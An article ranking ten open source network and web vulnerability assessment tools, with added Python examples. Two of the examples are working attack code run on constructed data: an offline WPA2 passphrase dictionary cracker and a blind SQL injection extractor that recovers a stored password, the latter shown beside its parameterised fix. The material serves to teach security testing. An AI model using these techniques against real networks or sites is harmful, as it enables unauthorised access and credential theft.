Modern data centres deploy firewalls and managed networking components, but are still left exposed to crackers. Hence, there is a crucial need for tools that accurately assess network vulnerability. This article brings you the top 10 assessment tools to address these issues, categorised based on their popularity, functionality and ease of use.
Vulnerabilities are unfortunately an integral part of every software and hardware system. A bug in the operating system, a loophole in a commercial product, or the misconfiguration of critical infrastructure components makes systems susceptible to attack. Attackers can penetrate systems via these vulnerabilities, for personal or commercial gain. While this is not technically easy, there have been enough successful attempts to cause one to worry.
Earlier, it was believed that this was true only for commercial products. Yet, lately, open source systems have been cracked too, resulting in data theft and a loss of reputation or money. Apart from local area networks, websites are also vulnerable and have become the prime target of crackers. In short, vulnerabilities can be exploited from within the organisation, as well as over the Internet by unknown people.
On the bright side, with the number of attacks increasing, there are now a slew of tools to detect and stop malware and cracking attempts. The open source world has many such utilities (and distros). Here, I must mention BackTrack Linux, which has gained international fame for its wide range of vulnerability assessment and digital forensics software utilities. The most recent version also contains powerful wireless vulnerability testing tools.
Though there are literally hundreds of tools, I have selected the top 10 on the basis that no other tool can really replace them. The primary selection criteria have been the feature set, how widespread the product is within the security community, and simplicity.
Please refer to Figure 1, which shows the top five tools I chose for network assessment, while Figure 2 shows the leading Web vulnerability scanning products. Of course, only FOSS tools are mentioned. I have presented the tools in the order in which they are expected to be used to detect vulnerabilities; this should provide a systematic approach to readers who wish to make a career as certified penetration testers.
Figure 1: Top 5 network security scanners
Figure 2: Top 5 web security scanners
The top 5 network security assessment tools
Vulnerability scanning of a network needs to be done from both within the network and from outside it (from both "sides" of the firewall), because the two views differ: an internal scan sees everything the firewall hides from the Internet, while an external scan shows what an outsider can actually reach. The approach I would suggest is to start from the network evaluation phase, where sniffing and reconnaissance are performed. The gathered data is then used in the attack phase to exploit the exposed vulnerabilities.
Wireshark
The very first step in vulnerability assessment is to have a clear picture of what is happening on the network. Wireshark (previously named Ethereal) puts the network interface into promiscuous mode and captures every frame that reaches it. Note that this covers the Layer 2 broadcast domain, not a "TCP" one: on a switched network the card only sees broadcasts and traffic addressed to the host itself, so to observe other hosts' conversations you need a SPAN/mirror port on the switch, a network tap, or a capture point on the gateway.
Customised filters can be set to intercept specific traffic; for example, to capture communication between two IP addresses, or to capture UDP-based DNS queries on the network. Wireshark has two kinds of filter: capture filters in BPF syntax (for instance "host 10.0.0.5 and host 10.0.0.53", or "udp port 53"), which decide what is written to disk, and display filters (for instance "ip.addr == 10.0.0.5 && ip.addr == 10.0.0.53", or simply "dns"), which narrow down what you look at. Traffic data can be dumped into a capture file, which can be reviewed later, and additional display filters can be set during the review.
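As an added illustration (this is not code from the article or from the Wireshark project), the following Python script shows what a display filter actually does with a capture file. It writes a tiny, constructed pcap in memory, dissects each frame down Ethernet/IPv4/UDP/DNS the way Wireshark's protocol tree does, and then applies two predicates that correspond to the "dns" and "ip.addr == a && ip.addr == b" display filters. The addresses, names and timestamps are made up; IP and UDP checksums are left at zero because a reader does not need them.

```python
import socket
import struct

# Constructed capture: a tiny pcap written from scratch so the example runs offline
# (a real one comes from Wireshark or 'tshark -w'). Dict keys mirror Wireshark field names.
PCAP_MAGIC = 0xA1B2C3D4
ETH = bytes.fromhex("020000000001") + bytes.fromhex("020000000002") + b"\x08\x00"  # dst, src, IPv4


def ipv4_header(src, dst, proto, payload_len):
    # IPv4 without options; checksum left at 0 (Wireshark flags it but still dissects)
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, 64, proto, 0,
                       socket.inet_aton(src), socket.inet_aton(dst))


def dns_query(qname):
    labels = b"".join(bytes([len(part)]) + part.encode() for part in qname.split("."))
    header = struct.pack("!HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0)  # standard query, one question
    return header + labels + b"\x00" + struct.pack("!HH", 1, 1)  # QTYPE A, QCLASS IN


def udp_frame(src, dst, sport, dport, payload):
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    return ETH + ipv4_header(src, dst, 17, len(udp)) + udp


def pcap_bytes(frames):
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, 1)  # v2.4, linktype 1 = Ethernet
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(frame), len(frame)) + frame
    return out


def read_pcap(data):
    """Yield (timestamp, frame) from a classic pcap file of either byte order."""
    magic, = struct.unpack_from("<I", data, 0)
    order = "<" if magic == PCAP_MAGIC else ">"
    off = 24
    while off + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack_from(order + "IIII", data, off)
        off += 16
        yield ts_sec + ts_usec / 1e6, data[off:off + incl_len]
        off += incl_len


def parse_qname(buf):
    labels, off = [], 0
    while off < len(buf) and buf[off] != 0:
        n = buf[off]
        labels.append(buf[off + 1:off + 1 + n].decode())
        off += 1 + n
    return ".".join(labels)


def dissect(frame):
    """Ethernet -> IPv4 -> UDP -> DNS; returns a flat dict keyed like Wireshark's field names."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None  # not IPv4
    ihl = (frame[14] & 0x0F) * 4
    pkt = {"ip.src": socket.inet_ntoa(frame[26:30]), "ip.dst": socket.inet_ntoa(frame[30:34]),
           "ip.proto": frame[23]}
    l4 = frame[14 + ihl:]
    if pkt["ip.proto"] == 17 and len(l4) >= 8:
        pkt["udp.srcport"], pkt["udp.dstport"] = struct.unpack("!HH", l4[:4])
        if 53 in (pkt["udp.srcport"], pkt["udp.dstport"]) and len(l4) > 20:
            pkt["dns.qry.name"] = parse_qname(l4[20:])  # skip 8 UDP + 12 DNS header bytes
    return pkt


def apply_filter(pcap, predicate):
    """The equivalent of a display filter: dissect every frame, keep those matching the predicate."""
    hits = []
    for _ts, frame in read_pcap(pcap):
        pkt = dissect(frame)
        if pkt and predicate(pkt):
            hits.append(pkt)
    return hits


SAMPLE = pcap_bytes([
    udp_frame("10.0.0.5", "10.0.0.53", 40001, 53, dns_query("intranet.example.test")),
    udp_frame("10.0.0.7", "10.0.0.53", 40002, 53, dns_query("updates.example.test")),
    udp_frame("10.0.0.5", "192.0.2.1", 123, 123, b"\x1b" + b"\x00" * 47),  # NTP, must not match
    udp_frame("10.0.0.5", "10.0.0.53", 40003, 53, dns_query("updates.example.test")),
])


def dns_queries(pcap=SAMPLE):
    """Display filter 'dns.qry.name': (client, name) for every query seen."""
    return [(p["ip.src"], p["dns.qry.name"]) for p in apply_filter(pcap, lambda p: "dns.qry.name" in p)]


def conversation(a, b, pcap=SAMPLE):
    """Display filter 'ip.addr == a && ip.addr == b': both directions between two hosts."""
    return apply_filter(pcap, lambda p: {p["ip.src"], p["ip.dst"]} == {a, b})
```

The point of the two filter functions is the one Wireshark users learn early: "ip.src == a" and "ip.addr == a" are different questions, and a filter on the DNS dissector only matches frames the dissector could actually parse, so a capture truncated with a small snaplen will silently hide queries.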
Typically, the tester is looking for stray IP addresses, spoofed packets, unnecessary packet drops, and suspicious packet generation from a single IP address. Wireshark gives a broad and clear picture of what is happening on the network.
However, it has no intelligence of its own and should be treated as a data provider: it shows what crossed the wire and leaves the interpretation to the tester. Thanks to its excellent GUI, anyone with even basic networking knowledge can use it.
Nmap
This is probably the only tool that has stayed popular for well over a decade. This scanner is capable of crafting packets and performing scans at a granular TCP level: a SYN scan (-sS) sends only the first packet of the handshake and infers the port state from the SYN/ACK or RST that comes back, while an ACK scan (-sA) sends unsolicited ACKs to learn which ports a stateful firewall is filtering. Its OS detection (-O) compares quirks in the target's TCP/IP stack responses against a signature database to guess the operating system, and service detection (-sV) probes open ports to identify the application and its version.
Nmap is effective enough to detect remote devices, and in most cases correctly identifies firewalls, routers, and their make and model. Network administrators can use Nmap to check which ports are open, and also whether those ports can be exploited further in simulated attacks. Besides its verbose plain-text output, Nmap can write XML (-oX) and greppable (-oG) output; these are what you want when scripting the tool to automate routine tasks, compare a scan against a baseline, and grab evidence for an audit report.
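To show the scripting side concretely, here is an added example (my own code, not from the article or the Nmap project) that reads Nmap's XML output with the standard library, keeps only the open ports with their service banners, flags cleartext services as audit findings, and diffs the result against a previous scan. The XML below is constructed by hand for two hosts in 192.0.2.0/29, but its element and attribute names (nmaprun, host, address, ports, port, state, service, os, osmatch) are the ones Nmap really writes with -oX. The list of "cleartext services" is an assumed local policy.

```python
import xml.etree.ElementTree as ET

# Constructed nmap -oX output for two hosts; element/attribute names follow nmap's real DTD.
SCAN_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sV -O -oX scan.xml 192.0.2.0/29" version="7.94">
<host><status state="up" reason="arp-response"/>
<address addr="192.0.2.10" addrtype="ipv4"/>
<hostnames><hostname name="web01.example.test" type="PTR"/></hostnames>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh" product="OpenSSH" version="8.9p1"/></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http" product="nginx" version="1.18.0"/></port>
<port protocol="tcp" portid="443"><state state="filtered" reason="no-response"/><service name="https"/></port>
</ports>
<os><osmatch name="Linux 5.X" accuracy="95"/></os>
</host>
<host><status state="up" reason="arp-response"/>
<address addr="192.0.2.11" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="21"><state state="open" reason="syn-ack"/><service name="ftp" product="vsftpd" version="3.0.3"/></port>
<port protocol="tcp" portid="23"><state state="open" reason="syn-ack"/><service name="telnet"/></port>
</ports>
</host>
</nmaprun>"""

# Assumed policy: services that must not be reachable in cleartext on this network.
CLEARTEXT_SERVICES = {"ftp", "telnet", "rsh", "rlogin"}


def parse_nmap_xml(xml_text):
    """Return {ip: {"hostname", "os", "open": {(proto, port): (service, banner)}}} for hosts that are up."""
    hosts = {}
    for host in ET.fromstring(xml_text).iter("host"):
        if host.find("status").get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']").get("addr")
        hn, osm = host.find("hostnames/hostname"), host.find("os/osmatch")
        entry = {"hostname": hn.get("name") if hn is not None else None,
                 "os": osm.get("name") if osm is not None else None, "open": {}}
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue  # closed/filtered ports are noise in an audit report
            svc = port.find("service")
            name = svc.get("name") if svc is not None else "unknown"
            banner = " ".join(filter(None, [svc.get("product"), svc.get("version")])) if svc is not None else ""
            entry["open"][(port.get("protocol"), int(port.get("portid")))] = (name, banner)
        hosts[addr] = entry
    return hosts


def audit_findings(hosts):
    """One line of evidence per open cleartext service, ready to paste into the report."""
    findings = []
    for ip, h in sorted(hosts.items()):
        for (proto, port), (name, banner) in sorted(h["open"].items()):
            if name in CLEARTEXT_SERVICES:
                findings.append(f"{ip}:{port}/{proto} exposes {name} {banner}".rstrip())
    return findings


def diff_scans(baseline, current):
    """Routine task: which open ports appeared since the previous scan?"""
    new = []
    for ip, h in current.items():
        before = baseline.get(ip, {}).get("open", {})
        new += [(ip, port) for port in h["open"] if port not in before]
    return sorted(new)
```

Run the same parser over yesterday's and today's XML and diff_scans tells you which ports somebody opened overnight, which is usually a more useful daily signal than the raw list of everything that is open.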
You can read the series of Nmap articles published earlier for better understanding.
Metasploit
Once sniffing and scanning are done using the above tools, it's time to go to the OS and application level. Metasploit is a fantastic, powerful open source exploitation framework: its auxiliary modules can scan a set of IP addresses for specific weaknesses, and its exploit modules then attempt to compromise the vulnerable hosts and run a payload on them.
Unlike many other frameworks, it can also be used for anti-forensics. Expert programmers can write a module exploiting a particular vulnerability and run it through Metasploit to see whether the attack gets detected by the defences in place. The process also works in reverse: when malware is found exploiting a previously unknown vulnerability, a Metasploit module for it can be used to verify that the patch really closes the hole.
While Rapid7 sells commercial editions (Express and Pro), the underlying Metasploit Framework is open source under a BSD licence, and the free Community edition makes no compromises on the exploit and payload feature set, which is why it is mentioned here.
OpenVAS
The Nessus scanner is a famous commercial utility; OpenVAS forked from it when Nessus went closed source, so as to remain open source. Though Metasploit and OpenVAS overlap in the vulnerabilities they know about, there is still a distinct difference: OpenVAS detects and reports, while Metasploit exploits.
OpenVAS is split into two major components: a scanner and a manager. A scanner runs on a host with network reach to the targets (it need not be installed on the target itself, since it tests targets over the network, optionally with credentials for a deeper authenticated scan) and feeds vulnerability findings to the manager. The manager collects inputs from multiple scanners, stores them, and applies its own logic to create a report.
In the security world, OpenVAS is believed to be very stable and reliable for detecting the latest security loopholes, and for providing reports and inputs to fix them. The built-in Greenbone Security Assistant provides a GUI dashboard that lists all vulnerabilities and the impacted machines on the network.
Creating detailed reports is one thing that makes OpenVAS a tool favoured by infrastructure security managers.
Aircrack
The list of network scanners would be incomplete without wireless security scanners. Today's infrastructure contains wireless devices in the data centre as well as in corporate premises to facilitate mobile users. While WPA2 security is believed to be adequate for 802.11 WLAN standards, misconfiguration and the use of over-simple passphrases leave such networks open to attack.
Aircrack-ng is a suite of software utilities that acts as a sniffer, packet injector and key cracker. The wireless card is put into monitor mode (airmon-ng), airodump-ng captures the target network's frames, and aireplay-ng injects traffic, for instance a deauthentication frame that forces a client to reconnect, so that the WPA2 four-way handshake gets captured. The handshake reveals no key by itself, but aircrack-ng can then run an offline dictionary attack against the capture file: each candidate passphrase is stretched into a PMK with PBKDF2 and checked against the MIC in the handshake, so the only real protection is a passphrase that is not in any wordlist. (Legacy WEP is a different story: collecting enough IVs lets the key be recovered statistically within minutes.) Aircrack-ng is capable of working on most Linux distros, but the one in BackTrack Linux is highly preferred.
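The following added example (my own code, not part of the article or of the Aircrack-ng project) implements the offline check that aircrack-ng performs on a captured WPA2 handshake, using only Python's standard library. The key derivation is the one specified in IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations), PTK = PRF-512 over the two MAC addresses and nonces, and the MIC of the second EAPOL-Key message is HMAC-SHA1-128 under the first 16 bytes of the PTK. The "captured" handshake is constructed here from a deliberately weak passphrase so that the script is self-contained; in practice the SSID, MACs, nonces and EAPOL frame are read from airodump-ng's capture file.

```python
import hashlib
import hmac

MIC_OFFSET = 81  # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields precede the MIC


def pmk(passphrase, ssid):
    # IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def ptk(pmk_bytes, ap_mac, sta_mac, anonce, snonce):
    # PRF-512: HMAC-SHA1 over "Pairwise key expansion" || min/max(MACs) || min/max(nonces) || counter
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk_bytes, b"Pairwise key expansion\x00" + data + bytes([i]),
                            hashlib.sha1).digest() for i in range(4))
    return out[:64]  # KCK = first 16 bytes, KEK = next 16, TK = remaining 32


def eapol_mic(kck, eapol_frame_mic_zeroed):
    # WPA2 (key descriptor version 2): MIC = HMAC-SHA1-128 over the frame with its MIC field zeroed
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def eapol_key_msg2(snonce, mic=b"\x00" * 16):
    """Second handshake message (client -> AP): carries the SNonce and the first MIC."""
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key information: pairwise, MIC bit set, version 2
            + b"\x00\x10"                # key length
            + b"\x00" * 7 + b"\x01"      # replay counter
            + snonce + b"\x00" * 16      # key nonce, key IV
            + b"\x00" * 8 + b"\x00" * 8  # RSC, key ID
            + mic + b"\x00\x00")         # MIC, key data length (no key data)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body  # 802.1X header: v1, EAPOL-Key


def crack_psk(handshake, wordlist):
    """Offline dictionary attack: re-derive the MIC for each candidate and compare with the captured one."""
    eapol = handshake["eapol"]
    captured = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    for cand in wordlist:
        if not 8 <= len(cand) <= 63:  # WPA passphrases are 8 to 63 characters: skip everything else
            continue
        kck = ptk(pmk(cand, handshake["ssid"]), handshake["ap_mac"], handshake["sta_mac"],
                  handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured):
            return cand
    return None


# Constructed handshake. Real values come from airodump-ng's capture; here the MIC is produced
# from a weak passphrase so the cracker has something genuine to recover.
_SSID, _AP, _STA = b"CorpWiFi", bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
_ANONCE, _SNONCE = bytes(range(32)), bytes(range(100, 132))
_REAL_PASSPHRASE = "sunshine2012"
_kck = ptk(pmk(_REAL_PASSPHRASE, _SSID), _AP, _STA, _ANONCE, _SNONCE)[:16]
_mic = eapol_mic(_kck, eapol_key_msg2(_SNONCE))
HANDSHAKE = {"ssid": _SSID, "ap_mac": _AP, "sta_mac": _STA,
             "anonce": _ANONCE, "snonce": _SNONCE, "eapol": eapol_key_msg2(_SNONCE, _mic)}
WORDLIST = ["password", "letmein", "short", "sunshine2012", "admin123"]
```

Two things to notice: the 4096 PBKDF2 iterations are the only cost the attacker pays per candidate, and they are per SSID, so rainbow tables work against common network names; and the check needs nothing from the network once the handshake is captured, which is why a deauthentication burst followed by silence is the signature to look for in a wireless IDS.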
The top five Web security assessment tools
Scanning websites is an entirely different ballgame from network scans. In the case of websites, the scope of the scan ranges from Layer 2 to Layer 7, considering the intrusiveness of the latest vulnerabilities. The correct approach for scanning websites starts from Web-level access, right up to scanning all backend components such as databases. While most Web security scanners are automated, there could be a need for manual scripting, based on the situation.
Nikto
Let's start with this tool because of its feature set. This open source tool is widely used to scan web servers, mainly because it supports HTTP and HTTPS, and also provides findings in an interactive fashion. Rather than crawling a site, Nikto tests the server against a large database of known dangerous files, default scripts, outdated server software and insecure configuration, and does so in the least amount of time. It uses a technique called mutation (the -mutate option), whereby it generates additional file and directory names and combines its HTTP tests into an attack based on the Web server configuration and the hosted code.
Thus, it finds critical loopholes such as file upload misconfiguration, improper cookie handling, cross-site scripting, etc. Nikto dumps all findings in a verbose mode, which helps in knowing more about the Web vulnerabilities in detail. However, it can also result in too many things getting reported, some of which may be false alarms (any directory it manages to guess is reported, whether or not it holds anything sensitive). Hence, care should be taken while interpreting Nikto logs.
Samurai framework
Once a baseline check is performed by Nikto, the next step is to take the “deep-dive” approach. Samurai is a framework — a bunch of powerful utilities, each one targeted for a specific set of vulnerabilities.
It comes as a Linux distribution, purely focusing on penetration-testing tools such as WebScarab for HTTP mapping and w3af plugins for application-based attacks, and it also has tools to test browser-based exploits. It is amazing to note that the most recent version can find vulnerabilities that are usually not detected even by a few commercial software products.
Safe3 scanner
While the first two tools are good for static websites, for portals needing a user ID and password we need something that can deal with HTTP sessions and cookies. Safe3 scanner is a fantastic open source project, which has gained momentum and fame because it can handle almost all types of authentication, including NTLM.
It contains a Web crawler (a spider like that of a search engine) capable of ignoring duplicate page scans and yet detecting client-side JavaScript vulnerabilities. Safe3 scans also detect the possibility of the latest AJAX-based attacks and even report vulnerable script libraries. It comes with a user-friendly GUI and is capable of creating nice management reports.
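What "handling sessions" and "ignoring duplicate page scans" mean in practice is easier to see in code, so here is an added example of my own (not Safe3's code, and not from the article). It normalises URLs so that the different spellings of one page (a session ID in the query string or path, a fragment, reordered parameters) map to a single scan target, keeps one cookie jar across the crawl, and re-queues pages that bounced to the login page before the session cookie was obtained. The "site" is a constructed dictionary standing in for an HTTP client; the session parameter names are the usual suspects and are an assumption.

```python
import re
from collections import deque
from urllib.parse import parse_qsl, urlencode, urljoin, urlsplit, urlunsplit

# Query parameters and path segments that carry a session token rather than identify a page (assumed list).
SESSION_PARAMS = {"phpsessid", "jsessionid", "sid", "sessionid"}


def canonical(url):
    """Normalise a URL so that variants of the same page dedupe to one scan target."""
    parts = urlsplit(url)
    path = re.sub(r";jsessionid=[^/?#]*", "", parts.path, flags=re.I) or "/"
    query = sorted((k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
                   if k.lower() not in SESSION_PARAMS)
    return urlunsplit((parts.scheme.lower(), parts.netloc.lower(), path, urlencode(query), ""))


# Constructed portal (keys are canonical URLs). Pages marked auth need the cookie /login hands out.
SITE = {
    "http://portal.test/login": {"links": ["/account?sid=9f8e", "/account", "/help#faq", "/help?PHPSESSID=1"],
                                 "set_cookie": ("session", "abc123")},
    "http://portal.test/account": {"auth": True, "links": ["/account;jsessionid=ABC?tab=profile",
                                                           "/account?tab=profile",
                                                           "/export?fmt=csv&page=1",
                                                           "/export?page=1&fmt=csv"]},
    "http://portal.test/account?tab=profile": {"auth": True, "links": []},
    "http://portal.test/export?fmt=csv&page=1": {"auth": True, "links": ["/login"]},
    "http://portal.test/help": {"links": []},
}


def fake_fetch(url, cookies):
    """Stand-in for an HTTP GET with a cookie jar: returns (status, links, set_cookie)."""
    page = SITE.get(canonical(url))
    if page is None:
        return 404, [], None
    if page.get("auth") and cookies.get("session") != "abc123":
        return 302, ["/login"], None  # bounced to the login page
    return 200, page["links"], page.get("set_cookie")


def crawl(start, fetch=fake_fetch):
    """BFS crawl with one session cookie jar, scanning each canonical URL exactly once."""
    cookies, seen, deferred, queue, requests = {}, set(), [], deque([start]), 0
    while queue:
        url = queue.popleft()
        key = canonical(url)
        if key in seen:
            continue  # same page under another spelling: do not scan it again
        status, links, set_cookie = fetch(url, cookies)
        requests += 1
        if set_cookie and cookies.get(set_cookie[0]) != set_cookie[1]:
            cookies[set_cookie[0]] = set_cookie[1]
            queue.extend(deferred)  # the session changed: retry pages that bounced earlier
            deferred.clear()
        if status == 302:
            deferred.append(url)  # not scanned yet; only follow the redirect for now
            queue.extend(urljoin(url, link) for link in links)
            continue
        seen.add(key)
        if status == 200:
            queue.extend(urljoin(url, link) for link in links)
    return sorted(seen), requests
```

Starting the crawl on a protected page rather than on /login costs one extra request (the bounce) but still ends with all five pages scanned once, because the bounced URL is kept aside and retried after the cookie arrives. Without the canonicalisation step the same crawl would issue nine requests and scan the account page four times.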
Websecurify
Though very similar to Samurai, Websecurify also brings application-level assessment into play. In the case of a large Web farm where code is maintained by a team of developers, following standards can still yield insecure code, like passwords mentioned in code, physical file paths exposed by libraries, etc. Websecurify can crawl the running application and find such loopholes swiftly.
A nice feature is that it allows you to create screenshots of the problem areas automatically, which helps in preparing audit reports. It is one of the very few platform-independent tools and also supports mobile coding, which is helping it get more popular in the cyber-security assessment world.
SQLmap
Unless I mention a tool to detect SQL-injection attacks, this article would not be complete. Though this is a very old "first-generation" type of attack, many public websites still fail to fix it. sqlmap is capable of not just detecting and exploiting SQL-injection faults, but can also take over the database server. Since it focuses on a specific task, it works at great speed to fingerprint databases, find out the underlying file system and OS, and eventually fetch data from the server. It automates every injection technique, from UNION and error-based injection to boolean-based and time-based blind injection, where the data is inferred one character at a time from true/false or fast/slow responses. It supports almost all well-known database engines, and can also dump and crack the password hashes it finds. This tool can be combined with the other four tools mentioned above to scan a website aggressively.
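To make the "one character at a time" part tangible, here is an added example (my own code, not from the article or from the sqlmap project) that puts the classic bug and its fix side by side and then runs a boolean-based blind extraction against the vulnerable one, the way sqlmap's boolean technique works. An in-memory SQLite database stands in for the application's backend; the unicode() and substr() functions are SQLite's, and sqlmap uses each engine's equivalents (ASCII/SUBSTRING on MySQL, for example). The users, passwords and query are constructed.

```python
import sqlite3


def build_db():
    """Constructed target: an in-memory SQLite database standing in for the web app's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                     [("alice", "s3cret!"), ("bob", "hunter2")])
    return conn


def vulnerable_lookup(conn, user_id):
    """The first-generation bug: untrusted input concatenated into SQL. The only thing the attacker
    observes is whether a row came back (a 'user found' page versus a 'no such user' page)."""
    return conn.execute("SELECT name FROM users WHERE id = " + user_id).fetchone() is not None


def safe_lookup(conn, user_id):
    """Hardened form: a bound parameter is data, never SQL, so 'id = ?' cannot grow an AND clause."""
    return conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone() is not None


def blind_extract(oracle, subquery, max_len=64):
    """Boolean-based blind extraction: recover the result of `subquery` one character at a time,
    binary-searching each code point through a true/false oracle (7 requests per character)."""
    result = ""
    for pos in range(1, max_len + 1):
        probe = f"unicode(substr(({subquery}), {pos}, 1))"
        if not oracle(f"1 AND {probe} > 0"):
            break  # substr past the end gives '' -> unicode('') is NULL -> false: string complete
        lo, hi = 0, 127
        while lo < hi:  # invariant: the code point lies in [lo, hi]
            mid = (lo + hi) // 2
            if oracle(f"1 AND {probe} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


def demo(lookup=vulnerable_lookup):
    """Pull bob's password through the given lookup function; returns (secret, number of requests)."""
    conn = build_db()
    calls = 0

    def oracle(payload):
        nonlocal calls
        calls += 1
        return lookup(conn, payload)

    secret = blind_extract(oracle, "SELECT password FROM users WHERE name = 'bob'")
    return secret, calls
```

Against the vulnerable lookup the seven-character password costs 57 requests (8 per character plus one terminating probe), which is why sqlmap's boolean and time-based modes are slow but unstoppable once an oracle exists. Against the parameterised lookup the very first probe returns false and the extraction stops with nothing, while ordinary numeric input still works, which is the property a fix must have: it should not break the feature, only the injection.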
A vulnerability assessment toolkit should cover network scanning as well as website vulnerability exploitation. Open source software is prone to attacks too; hence, network administrators must know about the reputed scanners and use them in their daily tasks to make their infrastructure secure and stable.